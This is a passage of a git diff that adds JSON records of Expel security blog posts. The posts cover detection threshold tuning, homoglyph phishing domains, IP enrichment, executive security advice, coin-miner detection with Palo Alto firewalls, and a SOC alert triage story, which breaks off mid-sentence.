\u201cWhy not?\u201dWithout that approach, Expel\u2019s Week Without Meetings wouldn\u2019t have made it off the drawing board. Go ahead. Ask \u201cWhy not?\u201dand see what happens when you ditch meetings for a week. We can\u2019t wait to hear how it goes. If you try it, send us a note \u2013 we want to hear about your experience ." +} \ No newline at end of file diff --git a/creating-data-driven-detections-with-datadog-and.json b/creating-data-driven-detections-with-datadog-and.json new file mode 100644 index 0000000000000000000000000000000000000000..a19b0cd6224769eb5fe31b0e18afd864f209d4c2 --- /dev/null +++ b/creating-data-driven-detections-with-datadog-and.json @@ -0,0 +1,6 @@ +{ + "title": "Creating data-driven detections with DataDog and ...", + "url": "https://expel.com/blog/creating-data-driven-detections-datadog-jupyterhub/", + "date": "Feb 11, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Creating data-driven detections with DataDog and JupyterHub Security operations \u00b7 5 MIN READ \u00b7 DAN WHALEN \u00b7 FEB 11, 2020 \u00b7 TAGS: Get technical / How to / SOC / Tools Ask a SOC analyst whether brute forcing alerts brings them joy and I\u2019ll bet you\u2019ll get a universal and emphatic \u201cno.\u201d If you pull on that thread, you\u2019ll likely hear things like \u201cThey\u2019re always false positives,\u201d \u201cWe get way too many of them\u201d and \u201cThey never actually result in any action.\u201d So what\u2019s the point? Should we bother looking at these kinds of alerts at all? Well, as it often turns out when you work in information security \u2026 it\u2019s complicated. Although detections for brute forcing, password spraying or anything based on a threshold are created with good intentions, there\u2019s always a common challenge: What\u2019s the right number to use as that threshold? More often than we\u2019d like to admit, we resort to hand waving and \u201cfollowing our gut\u201d to decide. The \u201cright\u201d threshold is hard to determine and as a result we end up becoming overly sensitive, or worse, our threshold is so high that it causes false negatives (which isn\u2019t a good look when a real attack occurs). At Expel, we\u2019ve been working since day one to achieve balance: ensuring we have the visibility we need into our customers\u2019 environments without annoying our analysts with useless alerts. How data and tooling can help As it turns out, security and DevOps challenges have quite a bit in common. For example, how many 500 errors should it take to page the on-call engineer? This is similar to a security use case like password spraying detection. These shared problems mean we can use a suite of tools that are shared between security and DevOps to help tackle security problems. Some of our go-to tools include: DataDog , which captures application metrics that are used for baselining and alerting; and JupyterHub , which provides a central place for us to create and share Jupyter Notebooks. Step 1: Gather the right data To arrive at detection thresholds that work for each customer (by the way, every customer is different \u2026 there\u2019s no \u201cone size fits all\u201d threshold), we need to collect the right data. To do this, we started sending metrics to DataDog reflecting how our threshold-based rules performed over time. This lets us monitor and adjust thresholds based on what\u2019s normal for each customer. For example, as our detection rule for password spraying processes events, it records metrics that include: Threshold Value , which is the value of the threshold at the time the event was processed; and Actual Value , which is how close we were to hitting the threshold when the event was processed. By charting these metrics,we can plot the performance of this detection over time to see how often we\u2019re exceeding the threshold and if there\u2019s an opportunity to fine tune (increase or decrease it): This data is already useful \u2013 it allows us to visualize whether a threshold is \u201cright\u201d or not based on historical data. However, doing this analysis for all thresholds (and customers) would require lots of manual work. That\u2019s where JupyterHub comes in. Step 2: Drive change with data Sure, we could build DataDog dashboards and manually review and update thresholds based on this data in our platform but there\u2019s still room to make this process easier and more intuitive. We want to democratize this data and enable our service delivery team (made up of SOC analysts, as well as our engagement management team) to make informed decisions without requiring DataDog-fu. Additionally, it should be easy for our engagement management team to discuss this data with our customers. This is exactly why we turned to JupyterHub \u2014 more specifically, Jupyter Notebooks. We\u2019ve talked all about how we use JupyterHub before , and this is another great use case for a notebook. We created a Jupyter Notebook that streamlined threshold analysis and tuning by: Querying DataDog metrics and plotting performance; Allowing the simulation of a new threshold value; and Recommending threshold updates automatically. As an example, a user can review a threshold like below, simulate a new threshold and decide on a new value that\u2019s informed by real-world data for that customer. This lets us have more transparent conversations with our customers about how our detection process works and is a great jumping off point to discuss how we can collaboratively fine tune our strategy. Additionally, we added a feature to automatically review historical performance data for all thresholds and recommend review for thresholds that appear to be too high or too low. There\u2019s room for improvement here but we\u2019ve already had luck with simply looking at how many standard deviations off we are from the threshold value on average. For example, here\u2019s what a threshold that is set way too high looks like: By automating data gathering and providing a user interface, we enabled our service delivery team to review and fine tune thresholds. JupyterHub was key to our success by allowing us to quickly build an intuitive interface and easily share it across the team. Step 3: Correlate with additional signals Arriving at the right threshold for the detection use case is one important part of the puzzle, but that doesn\u2019t completely eliminate the SOC pain. Correlation takes you that last (very important) mile to alerts that mean something. For example, we can improve the usefulness of brute force and password spraying alerting by correlating that data with additional signals like: Successful logins from the same IP , which may indicate a compromised account that needs to be remediated; Account lockouts from the same IP , which can cause business disruption; and Enrichment data from services like GreyNoise , that help you determine whether this is an internet-wide scan or something just targeted at your org. By focusing on the risks in play and correlating signals to identify when those risks are actually being realized, you\u2019ll significantly reduce noisy alerts. Every detection use case is a bit different, but we\u2019ve found that this is generally a repeatable exercise. Putting detection data to work Detection data \u2014 in particular, knowing what true negatives and true positives look like \u2014 gives us the capability to more effectively research and experiment with different ways to identify malicious activity. One example of this comes from our data science team. They\u2019ve been looking into ways to avoid threshold-based detection to identify authentication anomalies. The example you see below shows how they used seasonal trends in security signals for a particular customer to identify potential authentication anomalies. By using that seasonal decomposition combined with the ESD (Extreme Studentized Deviate) test to look for extreme values, we can identify anomalous behavior that goes beyond the usual repetitive patterns we typically see. Thanks to these insights, we can automatically adjust our anomaly thresholds to account for those seasonal anomalies. We\u2019re lucky to have tools like DataDog and JupyterHub at our disposal at Expel, but improving detections is still possible without them. If you haven\u2019t yet invested in new tools, or are just getting started on continuously improving your detections, ask the following questions of the team and tools you already have: What does \u201cnormal\u201d look like in my environment? (ex: 10 failures per day) When is action required? (ex: when an account is locked) What other signals can we correlate with? (ex: login success) How many true positive versus false positive alerts are we seeing? Questions like these give you the ability to reason about detection in terms of your environment and its unique risks. Regardless of where the answers come from, this feedback loop is important to manage your signal-to-noise ratio and keep your analysts happy. Big thanks to Elisabeth Weber for contributing her data science genius to this post!" +} \ No newline at end of file diff --git a/customer-context-beware-the-homoglyph.json b/customer-context-beware-the-homoglyph.json new file mode 100644 index 0000000000000000000000000000000000000000..1c011dcfc3c3b0e17bfb7d3734190e83bc206aa2 --- /dev/null +++ b/customer-context-beware-the-homoglyph.json @@ -0,0 +1,6 @@ +{ + "title": "Customer context: beware the homoglyph", + "url": "https://expel.com/blog/customer-context-beware-the-homoglyph/", + "date": "1 day ago", + "contents": "Subscribe \u00d7 EXPEL BLOG Customer context: beware the homoglyph Security operations \u00b7 3 MIN READ \u00b7 PAUL LAWRENCE AND ROGER STUDNER \u00b7 MAY 16, 2023 \u00b7 TAGS: MDR This type of phishing attack can be ridiculously sneaky We love when our customers run red team engagements. Aside from testing and validating current security controls, detections, and response capabilities, we see it as a great opportunity to partner with our customers on areas of improvement. Here\u2019s the story of how a red team helped Expel improve our phishing service and how we used our platform capabilities to detect some sneaky activity. So, what happened? Our client\u2014let\u2019s call them Acme Corp\u2014had an enterprising red teamer with a clever idea. For one of their exercises, the red team purchased a domain: \u1ea1cmehome[.]com. Notice anything odd? Let\u2019s look closer: \u1ea1cmehome[.]com vs acmehome[.]com If you missed it, don\u2019t feel bad. That\u2019s the point. A bit of background The problem is that the \u201ca\u201d isn\u2019t an \u201ca\u201d at all, but an \u201c\u1ea1.\u201d It\u2019s a homoglyph \u2014\u201done of two or more graphemes, characters, or glyphs with shapes that appear identical or very similar but may have differing meaning.\u201d This one specifically is a Vietnamese particle used \u201cat the end of the sentence to express respect.\u201d Fast Company called homoglyph attacks (aka homography or Punycode attacks) one of the four most intriguing cyberattacks of 2022 . [They\u2019re] a type of phishing scam where adversaries create fake domain names that look like legitimate names by abusing International Domain Names that contain one or more non-ASCII characters. In other words, hackers discovered at some point that a lot of alphabets, like the Cyrillic and Russian alphabets, have characters that look like English or what we call Latin English. So, a Cyrillic \u201ca\u201d will be different from a Latin English \u201ca,\u201d but when these characters are used in domain names, they are indistinguishable to the naked eye. This allows phishers to spoof brand names and create look-alike domains which can be displayed in browser address bars if IDN display is enabled. There are lots of homoglyphs and the potential for mischief is off the hook (which is why top-level domain registries and browser designers are exploring ways to minimize the risks of h\u00f5m\u00f2gI\u00ffph\u00ec\u010d ch\u00e4\u00f4s). There\u2019s even a homoglyph \u201cattack ge\u00f1erator.\u201d This app is meant to make it easier to generate homographs based on homoglyphs than having to search for a look-a-like character in Unicode, then copying and pasting. Please use only for legitimate pen-test purposes and user awareness training. [emphasis added] Back to Acme. The red team\u2019s fake domain used the Vietnamese homoglyph to trick users into thinking it\u2019s the actual domain\u2014in this case, acmehome[.]com\u2014when that itty-bitty dot under the \u201ca\u201d makes a huge difference. The tactic also relies on a security operations center (SOC) analyst who\u2019s been staring at mind-numbing alerts slipping up and not noticing the difference in domain names. In truth, for most SOCs and attackers, this isn\u2019t a bad strategy. What we did After meeting with the red teamers, we uncovered a need to better scrutinize unique domains within emails that could intentionally trick the naked eye. Technology to the rescue. Since we have a content-driven platform capability\u2014customer context (CCTX)\u2014Expel was easily able to change the platform behavior to recognize the attack for that homoglyph site in Acme\u2019s Workbench\u2122. Having a platform that\u2019s content-driven means Expel users can change how the platform operates without having to engage with engineering teams to release new features. NOTE: When you have a platform that allows users to drive content and configuration, it means that once you understand how a feature works, you can bring your own creativity to solving problems. It\u2019s really fun when you\u2019re able to adapt a feature (especially if it allows for \u200crapid response to new or emerging techniques) to accomplish something unanticipated during the design of the feature\u2014which is what happened in this case. The result? Acme Corp\u2019s red team conducted a similar attack again, and this time the SOC caught it with CCTX. What does it all mean? Multiple things, possibly. First, homoglyphs represent a technique that SOCs need to account for. Second, there are branding reasons (as well as security ones) to sort homoglyph usage. While most businesses with accents and other homoglyphs in their names (Soci\u00e9t\u00e9 G\u00e9n\u00e9rale, A.P. M\u00f8ller-M\u00e6rsk, and Nestl\u00e9 come to mind), they typically use unaccented letters in their URLs. Would an analyst notice if a phishing attack used the homoglyph? Or, if the accented URL works (for example, lor\u00e9al.com), what if hackers put a different accent into play (\u00e8 vs \u00e9)? Third, this potentially matters even more for companies in nations whose languages employ \u200cextended iconography (this includes most non-English-speaking countries). Which means it matters more for cybersecurity firms serving them. Like us. Short version: homoglyph attacks are prevalent and sneaky. They pose particular challenges for human analysts, but as our Acme Corp case demonstrates, the combination of well-placed automation and humans leads to great results. If you have questions, or \u200cthink your organization might be at risk, drop us a line ." +} \ No newline at end of file diff --git a/cutting-through-the-noise-riot-enrichment-drives-soc.json b/cutting-through-the-noise-riot-enrichment-drives-soc.json new file mode 100644 index 0000000000000000000000000000000000000000..1cc74f68eb1dcba8bd62e272fc7b9a788097241a --- /dev/null +++ b/cutting-through-the-noise-riot-enrichment-drives-soc.json @@ -0,0 +1,6 @@ +{ + "title": "Cutting Through the Noise: RIOT Enrichment Drives SOC ...", + "url": "https://expel.com/blog/cutting-through-the-noise/", + "date": "Jul 15, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Cutting Through the Noise: RIOT Enrichment Drives SOC Clarity Security operations \u00b7 2 MIN READ \u00b7 EVAN REICHARD AND IAN COOPER \u00b7 JUL 15, 2022 \u00b7 TAGS: MDR / Tech tools Flash back to your days in the SOC. An alert shows up and your investigative habits kick in ( OSCAR , anyone?). It takes a few minutes, but you eventually determine that this alert is benign network traffic and not, in fact, command and control (c2) traffic to attacker-controlled infrastructure. Can you remember what information you used to reach that conclusion? (Of course not, but maybe remembering a particular third-party open source intelligence (OSINT) tool or query is enough to generate a sense of nostalgia for you.) At Expel, we arm our analysts with the best OSINT available to quickly and accurately spot benign or false positive alerts. This creates space to tackle suspicious activity head-on. More signal. Less noise. Enter the Greynoise RIOT (Rule It Out) API. Greynoise RIOT API To paraphrase the Greynoise team, RIOT adds context to IPs observed in network traffic between common business applications like Microsoft Office 365, Google Workspace, and Slack or services like CDNs (content delivery networks) and public DNS (domain name system) servers. These business applications often use unpublished or dynamic IPs, making it difficult for security teams to keep track of expected IP ranges. Without context, this benign network traffic can distract the SOC from investigating higher priority security signals. We use the RIOT API, plus several other enrichment sources, to help our analysts quickly recognize IPs associated with business services and dispatch network security alerts that don\u2019t require further investigation. Ruxie\u2122, our ever-inquisitive security bot, uses these APIs to collect enrichment information and parse the results for human consumption. RIOT Destination IP Summary RIOT info guides analysts as they orient themselves with alerts. A color-coded enrichment workflow helps them identify noteworthy details. For example, RIOT recognizes the above IP as trust level 2 , but it\u2019s classified as a CDN. Attackers can use a CDN to obfuscate their true source via domain fronting. IPs tagged as trust level 1 are more likely to be associated with an IP that\u2019s managed by a business or service, rather than a CDN. \ufeff CSI: Cyber \u2013 \u201cAll I got is green code\u201d Ruxie also enriches other pieces of network evidence, like domains. Analysts can immediately see the date a domain was registered: a recently registered domain should be treated with additional scrutiny since they\u2019re often associated with recently built attacker infrastructure. Malicious domains tend to be promptly taken down, forcing attackers to start over from scratch. More advanced attackers are known to buy and hold useful domain names for extended periods prior to an attack. RIOT arms our analysts with a simple, colorized tool for surfacing enrichment details so the SOC can quickly spot and dispatch non-threat activity. This means that when Josie\u2122 (our detection engine) and Ruxie (our orchestration bot) have decided an alert is worthy of review, the SOC can get to work on a triage knowing they\u2019re not wasting their time." +} \ No newline at end of file diff --git a/dear-fellow-ceo-do-these-seven-things-to-improve-your-org-s.json b/dear-fellow-ceo-do-these-seven-things-to-improve-your-org-s.json new file mode 100644 index 0000000000000000000000000000000000000000..4353fbd57021c8cffc77fdbc8b61a6edda25e7cc --- /dev/null +++ b/dear-fellow-ceo-do-these-seven-things-to-improve-your-org-s.json @@ -0,0 +1,6 @@ +{ + "title": "Dear fellow CEO: do these seven things to improve your org's ...", + "url": "https://expel.com/blog/dear-fellow-ceo-do-these-seven-things-to-improve-orgs-security-posture/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG Dear fellow CEO: do these seven things to improve your org\u2019s security posture Tips \u00b7 6 MIN READ \u00b7 DAVE MERKEL \u00b7 APR 17, 2019 \u00b7 TAGS: Managed security / Management / Overview / Planning You\u2019re at the helm of a fast-growing company. You\u2019re adding staff rapidly, and your team is starting to specialize. Hopefully most of your folks now have one job (or maybe two) instead of the five or six everyone had in the early days. Customers are flying at you left and right (not a bad thing!). Leading a fast-growing org has its perks. And yeah, it\u2019s exciting. But as you scale, you\u2019ll inevitably be breaking things as you stress the organization and look to add more capabilities and maturity everywhere you can. Oh, and did I mention that the \u201csnake that kills you today\u201d starts to change shape as you grow, too? It used to be that you were crossing your fingers to make the quarter. Now it\u2019s, \u201cDo we have mature enough finance and business processes to support Sarbanes Oxley?\u201d Another challenge that often pops up if it hasn\u2019t already: Do you have any clue what you\u2019re doing around information security? Maybe you started to care about that yourself. Maybe a well-traveled board member started asking some uncomfortable questions. I get that \u201cinformation security\u201d is probably toward the bottom of your list of \u201cthe snake(s) that\u2019ll kill you today.\u201d But here\u2019s the thing: a reckoning is coming and it usually shows up at a time that\u2019s least convenient. The good news: You can turn the (information security) ship around. Or get two hands back on the wheel if you\u2019ve been spending your time focusing on other things. Here are seven simple things you can do right now that\u2019ll get your org\u2019s security posture on track. 1. Hire an information security business executive, and have her or him report to you Yes, have this person report to you \u2014 the CEO. Don\u2019t be tempted to have him or her report the CIO, CTO or general counsel. You want a business executive that owns this domain as a close advisor, someone who can translate from security lingo to the language of your business and back again. This person should be a business executive . Someone that understands what your business does, its value proposition and the fact that their role isn\u2019t \u201csay no\u201d \u2014 it\u2019s \u201cfigure out how to say \u2018yes\u2019 while managing risk.\u201d Here\u2019s a litmus test on whether or not you have the right person \u2026 do the CIO and/or CTO respect the CISO\u2019s technical acumen? Would you hesitate to put this person in front of your board of directors so he or she can educate them on what they should care about and how they should hold the organization accountable for security risk? Do you respect this individual as an executive and can you see yourself proactively seeking his or her counsel? If you answered \u201cno\u201d to any of those questions, keep looking. 2. Identify the org\u2019s top information security risks and write them down As an executive, part of your job is to think about potential risks to the business and devise strategies to address them \u2014 like competitors, markets and external events that may impact your business. Security risks are as important to evaluate as any of the more \u201ctraditional\u201d business concerns that you\u2019ve historically considered. You have capable leaders to deal with risk in all parts of your business. They should all be at the table when you\u2019re talking about security because security impacts every part of your org. If you followed my advice above, you\u2019ll have a CISO \u2014 he or she can (and should) drive this process for you. Additionally, have your general counsel think about the potential legal ramifications of a security incident. And what about your CFO? How will a security-related misstep impact your bottom line? You get the idea. Bring all those brains to the table and work together to think through the various risks and the ripple effects they\u2019ll have on the broader org. Your execs need to be bought into that response plan, not victims of it. 3. Create your incident response \u201cbrain trust\u201d When something goes sideways (and trust me, it will) who will you call? Sure, the teams with technical expertise will be on the short list, but remember to think about all those potential ripple effects and make sure the right people are at the table when a bad thing happens. This includes legal counsel and even your corporate communications lead. Once again, your CISO will drive this process, but it needs to be sponsored by you so everyone knows it\u2019s important. The best way to prepare for a real security incident is to flex those muscles and practice responding as a group. A great way to do this is to orchestrate a tabletop incident response exercise. Your CISO can get started with your own by downloading our guide to tabletop exercises right here, which has everything you need to simulate a security incident: Oh Noes! A New Approach to IR Tabletop Exercises . When the CISO comes to you to get it scheduled make sure you support the initiative and give it weight. 4. Build out a true security team Create a security team that\u2019s separate from IT. When security is fully subordinate to IT you run the risk of thinking about security as a technology problem instead of a risk management capability. When security is part of IT, it can incentivize bad behavior. Security could be viewed as purely a cost instead of a necessity to manage risk. As a result, it could face significant budget pressures. Putting security under IT can also make it difficult to champion certain kinds of spends. For example, maybe buying security technology widgets is easy since IT is used to buying tech. But perhaps doing thoughtful risk assessments that span not just technology but business objectives, processes and functions becomes more challenging, if not outright impossible. Radical pro tip: consider having your IT team report to security \u2014 we did it and it works. Remarkably well, in fact. IT decisions almost always involve some aspect of cyber risk. By having your IT function report into security you enable security to be woven into your IT processes and decision making. This helps your organization build security into your systems and infrastructure from the get-go rather than \u201cbolting it on\u201d as an afterthought. 5. Put some quick security controls in place while you build a security program Conducting thorough assessments to understand security risks and technical control gaps are great, but the reality is that attackers aren\u2019t going to take a time out while you get your house in order. That\u2019s why it\u2019s essential that you and your CISO get (or keep) some basic security tools and processes in place quickly, while you simultaneously dive deep into a review of your security processes, programs and tools to figure out what needs fixing. As you work through your assessment, there are plenty of decisions you\u2019ll need to make as you figure out how you want to operate and lay a foundation that minimizes risk. For example, do you want to build your own SOC or use a vendor? What framework will you use to build and measure your new security program? Do you need new technology or are the tools you already have sufficient? 6. Pick a security framework that you\u2019ll use to assess your org Work with your CISO to pick a framework \u2014 there are plenty to choose from like the NIST Cybersecurity Framework , ISO 27001 , COBIT or something more specialized like HiTRUST \u2014 and stick with it. This will help your exec team communicate your position and plans in a consistent way among one another and with others (like your board, investors and outside counsel) who\u2019ll want those details. By using a framework to organize your planning and assessment activities, you\u2019ll be able to develop a coherent strategic plan, figure out where the gaps are and start to close them quickly. As a bonus, if you\u2019ve socialized the framework with your board, they\u2019ll be able to follow where you are on the journey and ask smarter questions. 7. Track your progress and learn from it Since you hired a CISO first , that person can drive this for you, and he or she will likely use the framework you picked above to backstop their conversations with you and your board about progress. As with so many things, your role is to give this weight. You need to care, ask questions and hold both your CISO and the rest of the organization accountable for delivering on initiatives to improve posture and manage risk. I know what you\u2019re thinking: \u201cThis sounds like any other aspect of my business \u2026 get a leader, listen to their counsel, assess business risks and initiatives in their area, take prompt action and posture for future success.\u201d BINGO. Security is not mystical, as long as you treat it as another function that\u2019s just as important as other key areas of your business, and hire a security leader who is a true peer to the rest of your exec team." +} \ No newline at end of file diff --git a/detecting-coin-miners-with-palo-alto-networks-ngfw.json b/detecting-coin-miners-with-palo-alto-networks-ngfw.json new file mode 100644 index 0000000000000000000000000000000000000000..653a6df6617fa77273912990ff7f27b17cf67210 --- /dev/null +++ b/detecting-coin-miners-with-palo-alto-networks-ngfw.json @@ -0,0 +1,6 @@ +{ + "title": "Detecting Coin Miners with Palo Alto Networks NGFW", + "url": "https://expel.com/blog/detecting-coin-miners-with-palo-alto-networks-ngfw/", + "date": "Jun 30, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Detecting Coin Miners with Palo Alto Networks NGFW Security operations \u00b7 5 MIN READ \u00b7 MYLES SATTERFIELD, BRIAN BAHTIARIAN AND TUCKER MORAN \u00b7 JUN 30, 2022 \u00b7 TAGS: MDR / Tech tools TL;DR 35% of the web application compromise incidents we saw in 2021 resulted in deployment of cryptocurrency coin miners. The Palo Alto Networks next-generation firewall (PAN NGFW) helps detect and investigate coin miner C2. This post walks through a cryptojacking example and provides helpful advice on how to avoid it in your own environment. Cybercriminals are always looking for new ways to make money. These methods don\u2019t always include holding data for ransom (although this tactic is a popular one). In fact, bad actors don\u2019t necessarily have to elevate privileges or move laterally to make their coin. Q: How? A: Cryptojacking . Cryptojacking is when a cybercriminal steals an organization\u2019s computing resources to mine various crypto currency blockchains. As our end-of-year report indicated, 35% of the web application compromise incidents we saw in 2021 resulted in deployment of various cryptocurrency coin miners. It\u2019s a sweet gig for the bad guys, too: after the miner is deployed, they can sit back, relax, and watch the money pile up. So how can organizations spot cryptojacking? One of the answers is Palo Alto Networks next-generation firewall (PAN NGFW) series. In addition to affording visibility into network traffic, PAN NGFW embeds different types of command and control (C2) detections. As the use of cryptojacking increases, we\u2019ve noted how PAN NGFW has helped detect and investigate coin miner C2 activity in our customers\u2019 environments. Throughout these investigations, we\u2019ve used PAN NGFW\u2014specifically, firewalls and Cortex XDR \u2014to quickly identify and respond to coin miner infections. To be clear: we don\u2019t believe coin miners are inherently bad\u2014it\u2019s the groups that are exploiting vulnerable web-apps for cryptojacking that are the problem. In this post, we\u2019ll walk through why we\u2019ve found PAN NGFW is great at detecting cryptojacking, and some actions we\u2019ve integrated into Ruxie\u2122, our detection bot, to help. Detecting cryptojacking with PAN NGFW Over the past year, 40% of PAN NGFW \u201cCoinMiner\u201d alerts triaged by our SOC were true positive\u2014an extremely high-performance result. In fact, anytime we ingest a PAN NGFW \u201cCoinMiner\u201d alert into Expel Workbench\u2122 (our analyst platform) we create a high severity alert where we aim to have eyes on the activity within 15 minutes. Our response time for this class of alert? Six minutes. Bottom line: the fidelity of these alerts is quite good. In coin mining incidents detected by our SOC, PAN NGFW \u201cCoinMiner\u201d alerts typically detected network connections to known mining pools (for example, \u201c moneropool[.]com \u201d), use of the JSON-RPC protocol, methods (example: \u201c mining.subscribe \u201d) associated with coin mining, and algorithms used by the miner (example: \u201c nicehash \u201d). Let\u2019s consider an example PAN NGFW coin mining alert in Workbench, the investigative steps we take to determine if the activity is a true positive, and some Ruxie actions we use to boost our investigation. Let\u2019s walk through an example alert This is what a PAN NGFW \u201cCoinMiner\u201d alert would look like in Workbench. Initial Palo Alto next-generation firewall coin-miner alert First, let\u2019s take a look at the source and destination IP addresses and ports. We can see the source IP address starts with 10. \u2014indicating the address is internal to the organization. Additionally, the source and destination ports reveal that the source IP address is likely the client and the destination is the server. (The source port is a part of the ephemeral port range and the destination port is 80, and likely HTTP traffic.) Therefore, if this is coin miner traffic, it\u2019s likely a miner installed on the internal machine reaching out to the mining server. Some quick research on the IP address indicates it\u2019s likely part of a hosting provider. Shodan suggests the IP address has port 80 open, but it\u2019s unclear as to what service is being offered. If we take a look at the application field, we see json-rpc is used. Some research shows crypto miners use json-rpc to communicate with their mining pools. Let\u2019s step through the communication flow covered in the reference: Diagram of json-rpc Stratum mining protocol The miner sends a login request to the mining pool for authorization If the authorization is successful, the server sends back a job for the miner to do After the miner completes the job, it sends back a submit to the mining pool server The server sends a response to the miner on whether the submission was successful or not The information from the alert and our research indicates this activity may align with coin mining. Now we can use information from Ruxie to get a better understanding of the traffic going back and forth. We have a Ruxie action that pulls netflow data involving the destination IP address- 45.9.148.21 . In the screenshot below, the data shows consistent communication from the source internal IP address 10.1.2.3 to the destination 45.9.148.21 . Additionally, there\u2019s consistency between the bytes being transferred each time the source IP connects to the destination. Netflow Ruxie action from source to destination IP addresses Finally, we have Ruxie download a packet capture file (PCAP) from the Palo Alto console (if available). Ruxie parses out readable strings as well as info from different layers in the packet. PCAP Ruxie Action What does this mean? The raw data from the packet above indicates active coin-mining activity. The json-rpc data suggests the server is giving the miner a job, specifying details such as the seed_hash and algorithm to use. This activity aligns with step 2 in the overview of mining communication traffic above. We can infer that a miner at or behind the source IP address performed the login process in step 1 because the server wouldn\u2019t have sent the job recorded in the PCAP if it didn\u2019t receive a successful login. At this point, we have enough evidence to conclude there\u2019s a coin miner installed on the host at or behind the IP address 10.1.2.3 . If we have access to endpoint technology, we can use it to determine what process is generating this traffic. We got \u2018em\u2014now what? To improve resilience, we first ask, \u201cHow did the coin miner get here?\u201d If we don\u2019t have access to the source machine of the activity, we may never uncover the answer. However, we can think about some of the common ways coin miners are deployed: Public application exploitation Attackers can exploit public-facing software that\u2019s vulnerable to a remote code execution (RCE) vulnerability to deploy crypto miners. How to prevent: Keep public-facing applications and software up-to-date. As our end-of-year report indicated, we typically see cybercriminals exploit one to three-year-old vulnerabilities. Access key compromise In the past, we\u2019ve watched attackers gain access to long term Amazon Web Services (AWS) access keys\u2014access keys that start with AKIA\u2014and abuse access to deploy EC2 instances and run crypto miners on the deployed instances. How to prevent: Make sure you aren\u2019t exposing access keys in public repositories and implement least privilege for AWS users. Phishing emails/USB devices Coin miners can be deployed via phishing emails or infected USB devices. How to prevent: Disable autorun on Windows 10 machines and educate end users on the impact of phishing emails. Key takeaways While we understand it\u2019s next to impossible to completely prevent coin miners from being deployed in your environment, here are three key recs for detecting coin mining activity in your org: Look for internal-to-external connections over the json-rpc protocol or to known mining pools (Monerohash, c3pool, and minergate, among others). If you\u2019re using a Palo Alto firewall, investigate their CoinMiner Command and Control Traffic and XMRig Miner Command and Control Traffic alerts. Consider services like Shodan and Censys to see what the internet can see about your attack surface." +} \ No newline at end of file diff --git a/detection-and-response-in-action-an-end-to-end-coverage.json b/detection-and-response-in-action-an-end-to-end-coverage.json new file mode 100644 index 0000000000000000000000000000000000000000..2060c4e2bf7d030fe1a1b4578b97067a9f763e4e --- /dev/null +++ b/detection-and-response-in-action-an-end-to-end-coverage.json @@ -0,0 +1,6 @@ +{ + "title": "Detection and response in action: an end-to-end coverage ...", + "url": "https://expel.com/blog/detection-and-response-in-action-an-end-to-end-coverage-story/", + "date": "Sep 8, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Detection and response in action: an end-to-end coverage story Security operations \u00b7 12 MIN READ \u00b7 NATHAN SORREL \u00b7 SEP 8, 2022 \u00b7 TAGS: MDR What does a comprehensive detection, response and threat hunting strategy look like? Glad you asked. Expel provides three primary service offerings\u2014managed detection and response (MDR), phishing prevention, and threat hunting\u2014and we offer those in a few different flavors to customers around the world. One size doesn\u2019t fit all when it comes to service delivery. Each customer\u2019s distinct environment, risk, and security posture requires that tools work together, so we built Expel to connect all of those services into one coherent, unified experience. The whole really is greater than the sum of its parts. So how do our MDR, phishing, and threat hunting services work, and most importantly, how do they work together ? The following soup-to-nuts description of Expel\u2019s security process borrows details from several real-life detection situations, and the accounts illustrate how our team shut hackers down. While we\u2019ve changed some particulars for the sake of privacy, this story accurately represents how our teams go from triaging alerts all the way to threat hunting and back. We\u2019ll walk you through the entire incident to illustrate how different players on the team and our complementary services reinforce each other. Detection: alert and triage It\u2019s a Sunday at 7:17am EST. The day shift analysts have arrived and are catching up on last night\u2019s activity. Reading through customer communications and recent investigations, the analysts soak up the news. Tools are logged into, browser tabs are organized, and the day begins. Girish checks on a verification request for updates he sent to a customer yesterday. Jenni flips through alerts, looking for \u201cthe weird.\u201d Chris puts the finishing touches on an investigation that looked odd at first, but was quickly explained by some research and a little IP prevalence mapping. Let\u2019s meet our talented crew. Girish, a detection and response analyst, helps keep all the balls in the air. His gift for leadership, organization, and process comes in handy when ensuring 24\u00d77 coverage across three shifts and 25+ analysts. In a given week Expel analyzes hundreds of incidents and conducts dozens of investigations. Girish, and others like him, keep the trains running. Chris\u2019 superpower is level-headedness. In security, where a frantic response can lead to disaster, Chris doesn\u2019t react, he responds, by taking a few seconds to reflect on the facts of a case. He radiates calmness, making the whole team make better, smarter decisions. Jenni seems to have threat intel on speed dial. She can research and document activity better than almost anyone. Offering accurate understanding and attribution regarding attack type can be profoundly helpful during an investigation. All of these folks have spent thousands of hours reviewing suspicious activity and investigating the \u201creally bad\u201d stuff from our customers. At 7:48 am EST, an alert arrives \u2014 DNS queries originating from the process Regsvr32.exe. Windows Defender ATP detects a common Windows binary making unusual network connections. This alert arrives in our medium severity queue and is examined by an analyst within 10 minutes. With our automation-forward approach, raw alerts are analyzed immediately by our detection bot, Josie\u2122. It commonly takes less than five minutes for Josie to escalate an alert to a human analyst, and for that analyst to confirm the alert is a threat. We consistently triage our highest fidelity alerts in about two minutes. We track our response time in minutes and we like it that way. Jenni takes a look and quickly notes the processes involved. Its parent is Winword.exe and Jenni begins to comb through its command line arguments. Her experience, combined with open-source tools like Echotrail.io, tell her that the process Regsvr32.exe isn\u2019t commonly generated by the Microsoft Word process. Its network connections heighten her interest, so she digs deeper. Beyond the experience of seeing thousands of alerts a month, our analysts use in-house datasets and open source tools (like Greynoise ) to determine the prevalence and meaning of observed events. Asking questions like, \u201cIs this activity actually uncommon on a global scale?\u201d and \u201cDoes this IP address have a reputation?\u201d leads analysts to better understand what they\u2019re seeing. Her first step is to look for any highlighted text on the Expel Workbench\u2122 alert page, which may indicate this host was involved in a previously disclosed exercise. But the CCTX around the endpoint name shows no indication that this activity is known or expected. \u201cThe host is not known\u2026the user is \u201cmukhi\u201d\u2026wonder who that is? \u2026Where is the\u2026\u201d Jenni\u2019s voice trails off as she thinks aloud through the evidence in front of her. We call it customer context or \u201cCCTX.\u201d It\u2019s most commonly displayed in Workbench as highlighted text. CCTX can be any specific insight provided by the customer related to expected activity from users, endpoints, or network locations, and it helps us quickly assess a situation. Additionally, our analysts flag red team assets, previously compromised hosts, and other artifacts for future reference. Each piece of CCTX information saves our analysts minutes of research, keeping our alert-to-fix times low. After initial triage and lacking further context, Jenni creates an investigation within Workbench and sets about organizing her research. Response: investigation and context This one will 